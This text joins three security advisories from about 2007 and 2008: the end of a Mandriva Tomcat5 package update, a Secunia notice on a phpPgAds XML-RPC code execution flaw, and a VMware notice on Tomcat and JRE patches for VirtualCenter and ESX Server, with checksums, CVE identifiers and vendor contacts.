0c944fe5d8725da8fd4e57e89539fa21 2008.0/x86_64/tomcat5-jasper-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
bcbb50b5978295bd40ec24212ca77a8a 2008.0/x86_64/tomcat5-jasper-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
472c0a30c7ad74c0cb63da51142de438 2008.0/x86_64/tomcat5-jsp-2.0-api-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
10c6da9615553dc07e2f59d226f30a1d 2008.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
53eba8a64c428e6e2a14e59095f958b4 2008.0/x86_64/tomcat5-server-lib-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
8c6849bcca11457dffd03aa9c9e9a35f 2008.0/x86_64/tomcat5-servlet-2.4-api-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
b5b42989963c31f79a997c9c18ed4cb4 2008.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
667a7b6fe2d3bc22ef64d87c2a6b9fe7 2008.0/x86_64/tomcat5-webapps-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
9522ebba28176adf03d9a7b33fb526f8 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.1mdv2008.0.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHXZ68mqjQ0CJFipgRAhO2AKC+AwaCU8LmMtlbmj5Q9HgrOr3PTwCeMZo1
QKCxPSeNSXZPdPEE6c2TDyk=
=z6UT
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
For more information:
SA15852
SOLUTION:
Update to version 2.0.5.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
Summary:
Updated Tomcat and Java JRE packages for VirtualCenter 2.0.2, ESX
Server 3.0.2, and ESX 3.0.1.
Relevant releases:
VirtualCenter Management Server 2
ESX Server 3.0.2 without patch ESX-1002434
ESX Server 3.0.1 without patch ESX-1003176
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2005-2090, CVE-2006-7195, and CVE-2007-0450 to
these issues.
JRE Security Update
This release of VirtualCenter Server updates the JRE package from
1.5.0_7 to 1.5.0_12, which addresses a security issue that existed in
the earlier release of JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2007-3004 to this issue.
Security best practices provided by VMware recommend that the
service console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.
Solution:
Please review the Patch notes for your product and version and verify
the md5sum of your downloaded file.
VMware VirtualCenter 2.0.2 Update 2 Release Notes
http://www.vmware.com/support/vi3/doc/releasenotes_vc202u2.html
VirtualCenter CD image
md5sum d7d98a5d7f8afff32cee848f860d3ba7
VirtualCenter as Zip
md5sum 3b42ec350121659e10352ca2d76e212b
ESX Server 3.0.2
http://kb.vmware.com/kb/1002434
md5sum: 2f52251f6ace3d50934344ef313539d5
ESX Server 3.0.1
http://kb.vmware.com/kb/1003176
md5sum: 5674ca0dcfac90726014cc316444996e
5. Contact:
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce@lists.vmware.com
* bugtraq@securityfocus.com
* full-disclosure@lists.grok.org.uk
E-mail: security@vmware.com
Security web site
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2008 VMware Inc